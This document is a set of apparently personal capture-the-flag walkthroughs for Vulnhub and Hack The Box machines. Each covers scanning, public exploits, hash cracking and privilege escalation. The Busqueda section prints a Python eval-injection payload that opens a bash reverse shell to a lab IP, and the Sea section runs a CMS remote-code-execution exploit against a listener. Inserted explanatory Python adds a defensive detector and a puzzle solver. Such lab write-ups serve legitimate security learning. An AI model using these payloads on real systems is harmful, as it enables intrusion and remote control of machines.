Categories: BOF, Vulnhub, Walkthrough

Kioptrix-1 Vulnhub Walkthrough

First, I performed a port and version scan using Nmap.

There is a buffer overflow vulnerability related to SSL.

I got the exploit from searchsploit. I uploaded the latest version of the exploit because there are some bugs in the previous version.

searchsploit -m unix/remote/47080.c

I only got a warning during compilation.

gcc -o OpenFuck 47080.c -lcrypto
./OpenFuck -h

I made some changes to the code. I downloaded ptrace-kmod.c to my local machine and opened a web service on port 5000.

Categories: finger, Hack The Box, Walkthrough

Sunday HTB Writeup

I scanned with the nmap command and tried different things.

Enumeration

Rustscan is a very useful tool for scanning all ports. The tool is very fast and can scan all ports within 1 second. I will use it for the entire enumeration process.

I scanned port 79 with finger-user-enum.pl. You can download the file. sammy and sunny may be able to log in to SSH.

Initial foothold

I tried SSH brute force with Hydra, but it took a lot of time, so I decided to use the port number as the password.

When I ran the sudo -l command, I saw that I can run a file without permission.

As I understand it, when I run the file, the output shows that the file runs the id command.

By the way, there is another user besides root and sunny: the sammy user. I looked at bash_history, and the backup directory is significant.

I found two hashes under the backup directory.

Privilege Escalation

I tried to crack the hash of sammy using the john command.

I logged in to SSH as user sammy, and when I ran the sudo -l command, I saw that I can use the wget command with root permission.

I replaced the troll file using the wget command and ran the troll command as the sunny user.

troll file

I created an HTTP server on my local machine to send the troll file to the target machine.

Categories: Hack The Box, misconfiguration, Web Security, Webservice

Knife HTB Writeup

I scanned all ports with nmap.

Enumeration

I searched for endpoints with gobuster, but it failed to find a directory.

Initial Foothold

I checked the header info, and the PHP version has a weakness.

The weakness causes a command execution vulnerability, and I can execute any command via the User-Agent header. I prepared the reverse shell command and executed it.

I accessed the target machine via the reverse shell.

Privilege Escalation

I executed the sudo -l command and sudo /usr/bin/knife, and I got info about how I can run this command.

I saw an interesting usage in the information that I can abuse.

The knife exec command lets me read the root.txt file and get the flag.

Categories: Hack The Box, misconfiguration, Walkthrough, Web Security, Webservice

Busqueda HTB Writeup

I scanned ports with nmap command.

Enumeration

I added the domain name to /etc/hosts.

Initial Foothold

I searched whether searchor 2.4.0 is vulnerable or not.

Okay. It is a vulnerable version, with a weakness that allows arbitrary code execution.

'+%2b+__import__('os').popen('id').read()+%2b+'
'+%2b+__import__('os').popen('bash+-c+"sh+-i+>%26+/dev/tcp/10.10.14.17/9001+0>%261"').read()+%2b'
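To show, from the defender's side, what the two payloads above exploit, here is an added Python example. It is not searchor's code and not the author's: a hypothetical model of an eval-based search dispatch in which a quoted-string breakout becomes code execution, the same lookup rewritten without eval, and a small log check that flags the breakout pattern. The engine names and URL templates are constructed for the example.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Constructed engine table; names and templates are an assumption for this example.
ENGINES = {
    "Google": "https://www.google.com/search?q={q}",
    "Bing": "https://www.bing.com/search?q={q}",
}


def vulnerable_search(engine: str, query: str) -> str:
    """Hypothetical model of the weakness: the raw query is spliced into a
    Python expression that is then eval()'d. A query that starts with a
    quote closes the string literal, so whatever follows runs as code and
    its result is concatenated back into the URL."""
    expr = f"ENGINES['{engine}'].format(q='{query}')"
    return eval(expr)  # never do this with user-controlled input


def safe_search(engine: str, query: str) -> str:
    """Hardened version: no eval at all. The engine is an allowlist lookup
    and the query is only ever data, percent-encoded into the URL."""
    template = ENGINES.get(engine)
    if template is None:
        raise ValueError(f"unknown engine: {engine!r}")
    return template.format(q=quote_plus(query))


# Quote breakout followed by '+' and a code-execution primitive, which is the
# shape of the two payloads on this page once their URL encoding is removed.
_BREAKOUT = re.compile(r"""['"]\s*\+.*?\b(__import__|popen|system|eval|exec)\s*\(""")


def looks_like_breakout(raw_query: str) -> bool:
    """Detection: decode a query parameter as the web server would see it and
    report whether it carries the string-breakout code-execution pattern."""
    decoded = unquote_plus(raw_query)
    return _BREAKOUT.search(decoded) is not None


if __name__ == "__main__":
    # Benign breakout that only evaluates 6*7: enough to prove the eval runs.
    probe = "'+str(6*7)+'"
    print("vulnerable:", vulnerable_search("Google", probe))
    print("safe:      ", safe_search("Google", probe))
    samples = (
        "'+%2b+__import__('os').popen('id').read()+%2b+'",  # payload from this page
        "python+eval+tutorial",                              # ordinary search
    )
    for sample in samples:
        print(f"{looks_like_breakout(sample)!s:5}  {sample}")
```

The benign probe makes the difference visible: the eval-based version returns a URL ending in `q=42`, proving the quote breakout ran Python, while the hardened version returns the probe percent-encoded as plain data. The detector is a coarse filter for access logs, not a replacement for removing eval.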

I got the reverse shell and read the user flag.

A few minutes later, I found the config, and there is a credential for cody. cody’s password is also the svc user’s password. I logged in as the svc user.

Privilege Escalation

I looked at the docker config via the docker-inspect command.

sudo python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' 960

I executed the docker-ps command and saw that mysql runs on the system, and I logged in to mysql with the gitea credentials.

I saw the administrator’s password hash, but I could not crack it, so I tried the config password found with the docker inspect command. Yes, it works.

I logged in to gitea as the administrator user and examined the code. I found a vulnerability that leads to the root user.

I prepared the payload to execute in the home/svc and

Categories: Hack The Box, misconfiguration, Walkthrough, Webservice

Nibbles HTB Writeup

Enumeration

I scanned ports with the nmap command. It found two ports, 22 and 80.

I examined the HTTP server on port 80.

I scanned directories with gobuster. There are valuable directories. I looked at all directories that return 200.

Initial Foothold

/README file

I searched whether this version of nibbleblog is vulnerable or not. Luckily, I found an exploit.

https://github.com/dix0nym/CVE-2015-6967

I created a shell payload to use as a webshell.

I ran the exploit script. The exploit uploads shell.php as image.php. I ran the command on the webshell.

I prepared a reverse shell payload and executed it over the webshell. I got the user flag.

Privilege Escalation

After the sudo -l command, I understood what I can do with monitor.sh and injected a bash command into the sh file. I got the root flag.

Categories: Hack The Box, Walkthrough

Sea HTB Writeup

Firstly, I scanned ports with nmap.

Two services are running on the target machine. I looked at the web service and scanned directories with gobuster.

All endpoints return either 403 or 301, and I can’t find more information about the website. Let’s go deeper. I scanned every endpoint until I found valuable info.

ffuf -c -w /SecLists-2024.4/Discovery/Web-Content/quickhits.txt -u "http://sea.htb/themes/bike/FUZZ" -t 200 -fx 403

I found out about the website’s CMS. The CMS is WonderCMS, and I searched whether there is a vulnerability or not. Luckily, I found an exploit.

https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE
python3 CVE-2023-41425.py -rhost http://sea.htb/loginURL -lhost 10.10.14.17 -lport 9001 -sport 8000

There is database.js under /var/www/sea/data.

The hash is a bcrypt hash, and I cracked it with hashcat.

hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

I looked at the users under the home directory.

I tried 2 users, and amay works for the SSH connection. I got the user flag.

After the netstat command, there are open ports whose numbers may help to find a new clue.

netstat -tlnp

I did port forwarding via the ssh command.

ssh -L 8888:localhost:8080 amay@sea.htb

I logged in with amay’s credentials.

I have analyzed

I click the analyze button.

I looked at the access.log directory to understand which user created the file.

The file was created by root. I opened Burp Suite and examined the request. I changed the request, and finally I got the root flag.

Categories: Hack The Box, Reverse Challenge

HTB Reverse Challenge: Hunting License

Hello All.

I have solved the Hunting License reverse challenge.

I opened the binary with Ghidra. We see the main function.

There is a function named exam. I looked at the exam function.

We see 2 functions: reverse and xor.

Firstly, I looked at the reverse function.

This function takes a list as param_1 and an integer value as param_2. The integer value provides the limit of the for loop. I looked at the t list and took a note for the reversing.

I looked at the other function. The function XORs local_38 with the t2 list.
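As an added example (not the challenge binary's code and not the author's notes), here is how the two checks described above, a reversed comparison bounded by a loop limit and an XOR against a key table, can be re-implemented in Python and then inverted to recover the expected answers. The byte tables T and T2 and the target buffer LOCAL_38 are constructed for this example; in a real solve they are copied out of the Ghidra listing.

```python
# Constructed stand-ins for the data tables read out of the decompiler.
# They are NOT the challenge's real values.
T = b"yadot_gnitnuh"                                           # hypothetical "t" list
T2 = bytes([0x13, 0x37, 0x42, 0x99, 0x7A, 0x5C, 0x01, 0x2F])  # hypothetical "t2" key list
LOCAL_38 = bytes([0x6B, 0x58, 0x30, 0xC6, 0x1C, 0x30, 0x60, 0x48])  # hypothetical target buffer


def reverse_check(user_input: bytes, expected: bytes, limit: int) -> bool:
    """Model of the reverse function: walk the first `limit` bytes of the
    input backwards and compare each one with the expected table."""
    if len(user_input) < limit or len(expected) < limit:
        return False
    return all(user_input[limit - 1 - i] == expected[i] for i in range(limit))


def xor_check(user_input: bytes, key: bytes, target: bytes) -> bool:
    """Model of the xor function: XOR the input with the key table and
    compare the result with the target buffer."""
    if len(user_input) != len(target):
        return False
    return bytes(b ^ k for b, k in zip(user_input, key)) == target


def solve_reverse(expected: bytes, limit: int) -> bytes:
    """Invert reverse_check: the answer is the table read backwards."""
    return expected[:limit][::-1]


def solve_xor(key: bytes, target: bytes) -> bytes:
    """Invert xor_check: XOR is its own inverse, so applying the key to the
    target buffer gives back the plaintext answer."""
    return bytes(t ^ k for t, k in zip(target, key))


if __name__ == "__main__":
    answer_reverse = solve_reverse(T, len(T))
    answer_xor = solve_xor(T2, LOCAL_38)
    print("reverse answer:", answer_reverse.decode(), reverse_check(answer_reverse, T, len(T)))
    print("xor answer:    ", answer_xor.decode(), xor_check(answer_xor, T2, LOCAL_38))
```

Re-implementing each check before inverting it is the useful habit here: the solver is only trusted once the recovered answer passes the model of the original check, which catches off-by-one mistakes in the loop limit or a misread key table before anything is typed into the nc session.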

I connected to the target IP and port with nc and encountered a console that asks some questions. I answered the questions.

After the last question, I get a flag.